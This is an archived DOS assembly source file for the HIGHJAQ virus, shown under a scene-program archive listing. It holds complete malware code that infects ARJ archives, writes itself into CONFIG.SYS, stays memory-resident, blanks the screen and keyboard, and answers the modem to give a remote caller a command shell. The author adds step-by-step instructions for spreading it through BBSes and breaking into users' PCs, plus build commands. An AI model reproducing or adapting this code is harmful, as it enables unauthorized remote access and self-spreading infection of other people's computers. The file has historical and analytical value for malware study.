home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
CCTX0198.ZIP
/
QMUPDAT7.ZIP
/
HIGHJAQ.ASM
< prev
next >
Wrap
Assembly Source File
|
1996-06-17
|
22KB
|
758 lines
Comment $
HIGHJAQ Virus
This virus exploits several security bugs of the IBM PC environment to give
a hacker full access to your PC with a modem.
Old ideas are now incorrect:
1. No one can gain access to my PC through my modem without modem software
running; this is now false.
2. If I download software from a BBS but don't run it, I can't get a virus;
this is now also false.
The bugs that this virus exploits are:
1. The Switch character "/" used instead of "\".
2. Windows' automatic execution of WINSTART.BAT file.
3. Execution of Non-*.COM and Non-*.EXE files in the CONFIG.SYS file.
4. Having a Modem connected to a phone line.
5. COMMAND.COM redirectability.
Here's how it works:
An infected *.ARJ file contains the file /WINSTART.BAT. When this *.ARJ file
is extracted into a directory to be scanned by a BBS, the /WINSTART.BAT file
does not go into the desired directory but goes into the root directory.
The first bug has been exploited.
If the owner of the BBS ever stops the BBS and starts Windows then the file
WINSTART.BAT in the root directory can get executed. This file when
activated, scans the drive of the PC for more *.ARJ files to add it's
/WINSTART.BAT to them. Also at this time, the /WINSTART.BAT will add a new
line to the C:\CONFIG.SYS that looks like this: INSTALLHIGH=C:\AKBM5IVC.1HN
(The name is random and does not have an .EXE or .COM extension so virus
scanners don't scan for it by default) The /WINSTART.BAT will then erase
itself. The second bug has been exploited.
This new file in the C:\CONFIG.SYS will become resident the next time the PC
reboots (272 Bytes). The third bug has been exploited.
After the HIGHJAQ virus goes memory resident from the C:\CONFIG.SYS file, it
constantly scans the COM ports for Modems. The hacker then calls the phone
number that the modem is attached to at least once every minute for three
consecutive minutes and just lets it ring once or twice then hangs up.
The virus sees this as a request to gain access to the PC. If this happens,
the Virus will reboot the system and activate the HIGHJAQ virus from the
C:\CONFIG.SYS and answer the Modem and connect the hacker to a COMMAND.COM
prompt on C:\> The fourth and fifth bug have been exploited and the PC is
wide open to attack.
Hackers, here is what to do:
1. Move the WINSTART.BAT file that is in your root directory to A:
2. Put an *.ARJ file that you wish to infect on Drive A:
3. A:
4. WINSTART
5. Edit C:\CONFIG.SYS and remove the last line INSTALLHIGH=C:\????????.???.
6. Call your favorite BBS that runs a Virus Scan on uploaded files.
7. Upload the *.ARJ file created in steps 1-4.
8. Let the BBS Scan it for viruses.
9. Hang-up.
10. Wait for several days, weeks etc.
11. Call the same BBS.
12. Download a different *.ARJ file.
13. See if the *.ARJ file has /WINSTART.BAT if so then the BBS ran Windows.
and infected all it's *.ARJ files. If not go to step 10.
14. Call the BBS and connect but then hang-up.
15. Repeat step 14 for 3 minutes.
16. Call BBS again (should take longer to answer because machine rebooted).
17. You should now have a C:\> prompt and HIGHJAQ will have identified which
COM port and baud rate you are connected on.
18. Use DEBUG scripts to create any program you want like LAPLINK.
19. EDLIN the AUTOEXEC.BAT to run LAPLINK in Modem mode.
20. Disconnect and call back and have LAPLINK answer.
21. Happy hacking.
Even better:
18. Be familiar with the BBS software and get the log files that show the
users and their home phone numbers, maybe even a log of what they
downloaded.
19. If the users downloaded an infected *.ARJ file they also have the HIGHJAQ
virus on their PC.
20. Repeat steps 14-21 on the Users phone (Just call and let it ring once or
twice and hang-up for 3 minutes).
Even even better:
1. Have your own BBS.
2. Infect all the *.ARJ files by running /WINSTART.BAT on you BBS.
3. Let people download infected *.ARJ software.
4. Wait for several days, weeks etc.
5. Call their PC's and gain access to them.
Experiment with the software and get to know how it works. Feel free to
share it with any BBS of your choice.
"Q" the Misanthrope
P.S. Works in Windows 95.
tasm highjaq
tlink /t highjaq
copy highjaq.com winstart.bat
winstart
$
page
qseg segment para public 'code'
simple proc far
assume cs:qseg,es:qseg,ds:qseg
VIDEO_DISABLE_BIT equ 20h
VGA_REG equ 3C4h
org 0100h
begin: db "::" ;label used for .com portion
jo nextjmp
jno nextjmp
db 0dh,0ah
db "@ctty nul",0dh,0ah ;hide activities
db "copy/b %0.bat+%0 c:\q.com",0dh,0ah
db "dir \*.arj/s/b|c:\q.com/i",0dh,0ah
db ":" ;infect all .ARJ files
nextjmp: jno nextjmp1
jo nextjmp1
db 0dh,0ah ;if already resident don't
db "if errorlevel 1 goto " ;infect config.sys again
jno $+(comcode-nextjmp1)
jo $+(comcode-nextjmp2)
db 0dh,0ah
db "ren c:\q.com " ;rename com program randomly
fname1 db "ABCDEFGH.IJK",0dh,0ah
db "echo INSTALLHIGH=C:\" ;infect config.sys
fname2 db "ABCDEFGH.IJK>>c:\config.sys",0dh,0ah
db ":"
nextjmp1: jno comcode ;windows 95 runs winstart.bat
nextjmp2: jo comcode ;while windows runs winstart
db 0dh,0ah
db "for %%a in (%0 %0.bat) do if exist %%a set q=%%a",0dh,0ah
db "del c:\q.com",0dh,0ah
db "ctty con",0dh,0ah
db "@del %q%",1ah ;delete batch file
comcode: mov bx,0003h ;see if this is from bat or
cmp byte ptr ds:[bx+80h-03h],bh
jne piped ;from the config.sys line
jmp notpiped
stopit: mov ax,0fefeh ;mem residency check
mov bx,ax
int 21h
mov ax,4c00h ;exit program
cmp si,1994h
je isres
push ax
mov ah,30h
int 21h
cmp al,05h ;don't infect config if less
pop ax ;than dos 5.0
jae notres
isres: inc al
notres: int 21h
piped: push cs
pop ds
push cs
pop es
mov di,offset inputbuf ;*.ARJ file name from pipe
push di
cld
getnextpipedch: mov ah,0bh ;check for more piped input
int 21h
or al,al
jz stopit
mov ah,06h ;get that piped char
mov dl,0ffh
int 21h
cmp al,0ah ;throw away linefeed
je getnextpipedch
cmp al,0dh ;null terminated cariage return
jne storeit
xor ax,ax
storeit: stosb
jnz getnextpipedch ;if not null get next char
mov cx,11
mov di,offset fname1
setname: xor ax,ax ;create random file name
out 43h,al
push cx
in al,40h
mov cx,ax
around: loop around ;psuedo random delay
pop cx
and al,1fh ;32 letters possible
add al,'A'
cmp al,'Z'
jbe nameit
sub al,42 ;if above Z then make it 1-6
nameit: stosb ;save random name
mov byte ptr ds:[fname2-fname1+di-01h],al
cmp cl,04h ;step over the .
jne incloop
inc di
incloop: in al,40h ;get the high byte
loop setname
pop dx ;point to file name
mov ax,3d02h
int 21h
jc piped
xchg ax,bx
mov ax,5700h ;get file date
push ax
int 21h
push cx
push dx
and cx,1fh ;see if date seconds=0
jz infected ;if so don't infect
call infectarj ;else infect it
infected: pop dx
pop cx
pop ax
inc ax
and cl,0e0h ;set seconds=0
int 21h
mov ah,3eh ;close and go to next file
int 21h
jmp piped
vname db 0dh,0ah,'HIGHJAQ on COM';virus name and com port
portasc db '1:38400,N,8,1',0dh,0ah
command db 'C:\COMMAND.COM',0 ;command interpreter
comtail db exectab-param-1
param db ' C:\ COM' ;with redirect line
ascport db '1 /E:1024/P/F',0dh
exectab dw 0,comtail,0,5ch,0,6ch,0
mstring db 'ATL0M0A',0dh,0ah ;answer modem quietly
mend label byte
notpiped: mov ax,ds ;executed from config.sys
dec ax
mov ds,ax
xor cx,cx ;misidentify program as IO
mov word ptr ds:[bx-03h+08h],'OI'
mov word ptr ds:[bx-03h+0ah],cx
mov ds,word ptr ds:[bx-03h+2ch+10h]
findname: inc bx ;find program name
cmp word ptr ds:[bx-04h],cx
jne findname
mov dx,bx
mov ax,4301h ;and set it to system and r/o
mov cl,05h
int 21h
push ds
pop es
mov ah,49h ;clear environment space
int 21h
mov bx,0040h ;examine comports
xor di,di
mov ds,bx
loopcom: mov dx,word ptr ds:[bx+di-40h]
or dx,dx
jz gores
inc bx
inc di
cmp bl,44h
je gores
add dl,07h ;3ffh scratchpad reg used
in al,dx ;to determine if necessary to
cmp al,'Q' ;answer modem and allow hacker
je foundq
dec dx
in al,dx
and al,30h ;dsr cts on?
cmp al,30h ;simple modem test
jne loopcom
mov word ptr cs:[bx+di+modems-42h],dx
jmp short loopcom
foundq: xor ax,ax ;86 'Q' in the scratchpad reg
out dx,al
push cs
pop ds
dec dx ;3feh
mov word ptr ds:[port],dx ;for monitoring hangup later
dec di ;di=com? number -1
add word ptr ds:[portasc],di
add word ptr ds:[ascport],di
jmp runcommand ;goto answering the modem
gores: push cs
pop ds
mov ax,3521h ;if normal residency get
int 21h ;interrupts
mov word ptr ds:[prev21],bx
mov word ptr ds:[prev21+2],es
mov ax,3508h
int 21h
mov word ptr ds:[prev8],bx
mov word ptr ds:[prev8+2],es
mov cx,(offset endrescode)-(offset rescode)
mov di,40h ;now move code down to 40h
mov si,offset rescode ;to save residency space
push cs
pop es
rep movsb
mov dx,(offset new8)-(offset rescode)+40h
mov ax,2508h ;set interrupts
int 21h
mov dx,(offset new21)-(offset rescode)+40h
mov ax,2521h
int 21h
lea dx,word ptr ds:[di+0eh]
mov cl,04h
shr dx,cl
mov ax,3100h ;go resident
int 21h
rescode label byte
modems dw 0,0,0,0 ;modem ports to monitor
ringcnt dw 0,0,0,0 ;if they rang in last minute
ring3 dw 2,2,2,2 ;count down timer
onemin dw 1091 ;one minute of timer ticks
new21: pushf
cmp ax,0fefeh ;for residency test
jne testchmod
cmp ax,bx
jne testchmod
mov si,1994h
testchmod: cmp ax,4300h
jne onward
push bx
mov bx,dx
cmp word ptr ds:[bx],'W/' ;allow ARJ.EXE to overwrite
pop bx ;/WINSTART.BAT files
jne onward
popf
stc
mov ax,0002h ;indicate file not found
retf 02h
onward: popf
jmp21: db 0eah
prev21 dd 0
setreboot: mov dx,word ptr ds:[bx+modems-rescode+40h]
inc dx ;reboot pc and allow hacker in
mov al,'Q' ;scratchpad reg rides through
out dx,al ;reset without changing value
reboot: xor cx,cx
poundreset: sti ;pound on the reset switch
mov al,0feh ;several thousand times
out 64h,al ;this will reboot windows etc.
loop poundreset
db 0eah ;all else fails goto f000:fff0
dd 0f000fff0h
new8: pushf
sti
push ax
push bx
push dx
push ds
push cs
pop ds
mov bx,0001h ;prime vm 1 if not in windows
mov ax,1683h
int 2fh
dec bx ;vm 1 in windows only
jnz donecom1
dec word ptr ds:[bx+onemin-rescode+40h]
jns nextcom1 ;check for minute mark
mov word ptr ds:[bx+onemin-rescode+40h],1091
nexttest: cmp byte ptr ds:[bx+ringcnt-rescode+40h],00h
je setring3 ;check to see if phone rang
mov byte ptr ds:[bx+ringcnt-rescode+40h],00h
dec byte ptr ds:[bx+ring3-rescode+40h]
js setreboot ;for 3 minutes, if so reboot
jmp short incbx
setring3: mov byte ptr ds:[bx+ring3-rescode+40h],02h
incbx: inc bx ;check next modem port
inc bx
cmp bl,08h
jb nexttest
jmp short donecom1
nextcom1: mov dx,word ptr ds:[bx+modems-rescode+40h]
or dx,dx ;get modem port
jz loopcom1
in al,dx
test al,44h ;test for ring or delta ring
jz loopcom1 ;if so indicate it rang
mov byte ptr ds:[bx+ringcnt-rescode+40h],01h
loopcom1: inc bx
inc bx
cmp bl,08h
jb nextcom1
donecom1: pop ds
pop dx
pop bx
pop ax
popf
db 0eah
prev8 dd 0
endrescode label byte
reboot8:
pushf
push ax
push bx
push dx
push ds
mov dx,03feh ;get port to monitor hangup
port equ $-2
in al,dx
test al,80h
jnz donecom1
gotoreboot: jmp reboot
runcommand: push cs
pop es
mov ah,0fh
int 10h
cbw
int 10h
sub dl,03h ;3fb
mov al,80h
out dx,al
sub dl,03h ;3f8
mov ax,03h
out dx,ax
add dx,ax ;3fb
out dx,al
inc dx ;3fc
out dx,al
inc dx ;3fd
inc dx ;3fe for 38400,N,8,1
push dx
mov dx,VGA_REG ;disable vga display
mov al,1 ;stolen from Ralf Brown
out dx,al
inc dx
in al,dx
dec dx
mov ah,VIDEO_DISABLE_BIT
and al,not VIDEO_DISABLE_BIT
or ah,al
mov al,1
out dx,al
inc dx
mov al,ah
out dx,al
pop dx
in al,21h ;disable keyboard
or al,02h
out 21h,al
mov bl,40h
mov ds,bx
mov cx,word ptr ds:[bx+6ch-40h]
add cx,5460 ;wait 5 minutes for hacker
retryring: push cx ;to call modem
sub cx,word ptr ds:[bx+6ch-40h]
pop cx
js gotoreboot
in al,dx
test al,40h ;check for ring
jz retryring
xchg dx,di ;output ATA string
cld
mov si,offset mstring
mov cx,word ptr((offset mend)-(offset mstring))
output_data: lods byte ptr cs:[si]
mov ah,01h
int 14h
loop output_data
xchg dx,di
mov cx,word ptr ds:[bx+6ch-40h]
add cx,1092 ;wait 1 minute for carrier
retrycd: push cx
sub cx,word ptr ds:[bx+6ch-40h]
pop cx
js gotoreboot
in al,dx
test al,80h
jz retrycd
mov ax,word ptr ds:[bx+6ch-40h]
add ax,55 ;wait 3 seconds to identify
wait3sec: push ax ;ourselves and com port
sub ax,word ptr ds:[bx+6ch-40h]
pop ax
jns wait3sec
push cs
pop ds
xchg dx,di
mov si,offset vname ;tell hacker which com port
mov cx,word ptr((offset command)-(offset vname))
output_data2: lods byte ptr ds:[si]
mov ah,01h
int 14h
loop output_data2
mov ax,3508h ;set up monitor for hanging up
int 21h
mov word ptr ds:[prev8],bx
mov word ptr ds:[prev8+2],es
mov dx,offset reboot8
mov ax,2508h
int 21h
push cs
pop es
mov bx,offset rend+0fh ;de-allocate space
mov cl,04h
shr bx,cl
mov ah,4ah
int 21h
mov dx,offset command ;run command.com
mov bx,offset exectab
mov word ptr ds:[bx+04h],ds
mov word ptr ds:[bx+08h],ds
mov word ptr ds:[bx+0ch],ds
mov ax,4b00h
int 21h
jmp reboot
;stolen from arjdrop in VLAD April Fools issue with only a couple of changes
infectarj proc near
;on entry bx=file handle
push ds
push es
push cs
pop ds
push cs
pop es
mov ax,4202h
xor cx,cx
cwd
int 21h
sub ax,4
sbb dx,0
mov cx,dx
mov dx,ax
mov ax,4200h
int 21h
mov word ptr csize,offset rend - 100h
mov word ptr osize,offset rend - 100h
mov cx,offset rend - 100h
mov si,100h ;start of program in memory
call crc32
cld
mov si,offset marker
mov di,offset sparebuff
mov cx,offset rend - offset marker
rep movsb
mov word ptr crc,ax
mov word ptr crc+2,dx
mov cx,word ptr bhsize
mov si,offset fhsize
call crc32
mov word ptr acrc,ax
mov word ptr acrc+2,dx
mov ah,40h
mov cx,offset fdata - offset marker
mov dx,offset marker
int 21h
mov ah,40h
mov cx,offset marker - 100h
mov dx,100h
int 21h
mov ah,40h
mov cx,offset rend - offset marker
mov dx,offset sparebuff
int 21h
mov ah,40h
mov cx,4
mov dx,offset fdend
int 21h
pop es
pop ds
ret
infectarj endp
crc32 proc near
;on entry cx=number of bytes to checksum
; si=pointer to bytes
;on exit dx:ax contains the checksum
;I stole this code from some PD sources I got off a BBS.
push bx
push cx
push si
push di
call gentable
mov dx,-1
mov ax,-1
crc32loop:
xor bx,bx
mov bl,byte ptr [si]
inc si
xor bl,al
shl bx,1
shl bx,1
mov al,ah
mov ah,dl
mov dl,dh
xor dh,dh
xor ax,word ptr [bx+crc32tab]
xor dx,word ptr [bx+crc32tab+2]
dec cx
jnz crc32loop
pop di
pop si
pop cx
pop bx
xor dx,-1
xor ax,-1
ret
crc32 endp
Gentable proc near
;Generates the 32bit crc table. Thanks to "Necrosoft Enterprises" who had
;this code inside their Dementia Virus. I have plenty of other code to do
;this, but it is all much, much bigger.
push ax
push cx
push dx
push di
mov di,offset crc32tab
xor cx,cx
outgen:
xor dx,dx
xor ax,ax
mov al,cl
push cx
mov cx,8
calcloop:
clc
rcr dx,1
rcr ax,1
jnc nocrcxor
xor dx,0edb8h
xor ax,8320h
nocrcxor:
loop calcloop
mov word ptr [di],ax
mov word ptr [di+2],dx
add di,4
pop cx
inc cx
cmp cx,100h
jne outgen
pop di
pop dx
pop cx
pop ax
ret
Gentable endp
rbuff:
marker db 60h,0eah
bhsize dw offset acrc - offset fhsize
fhsize db offset aname - offset fhsize
anum db 6
anum2 db 1
osver db 0
aflag db 0
ameth db 0 ;stored
aftype db 0 ;binary
ares db 0
dtm dd 20df33e0h ;06/31/96 06:31:00 my birthday
csize dd 4 ;compressed size
osize dd 4 ;original size
crc dd 0
fspec dw 0
faccess dw 0
hstdata dw 0
aname db "/WINSTART.BAT",0 ;Switch Character for Root Dir
acomm db 0
acrc dd 0
ehsize dw 0
fdata db "!"
fdend:
db 60h,0eah,0,0
rend:
crc32tab db 100h*4 dup (0)
sparebuff:
inputbuf label byte ;piped file name of *.ARJ file
endcode label byte
simple endp
qseg ends
end begin